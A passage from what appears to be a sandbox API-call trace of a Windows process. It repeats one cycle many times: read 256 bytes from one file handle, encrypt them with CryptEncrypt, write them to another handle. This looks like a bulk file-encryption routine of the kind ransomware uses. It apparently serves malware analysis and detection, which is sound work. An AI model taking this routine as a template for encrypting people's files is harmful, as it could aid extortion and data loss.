lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.466] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.466] GetLastError () returned 0x0 [0153.466] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.466] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.467] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.467] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.467] GetLastError () returned 0x0 [0153.467] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.468] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.468] GetLastError () returned 0x0 [0153.468] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.468] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.469] GetLastError () returned 0x0 [0153.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.469] GetLastError () returned 0x0 [0153.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.469] GetLastError () returned 0x0 [0153.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.469] GetLastError () returned 0x0 [0153.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.469] GetLastError () returned 0x0 [0153.469] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.469] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.469] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.470] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.470] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.470] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.470] GetLastError () returned 0x0 [0153.470] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.470] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, 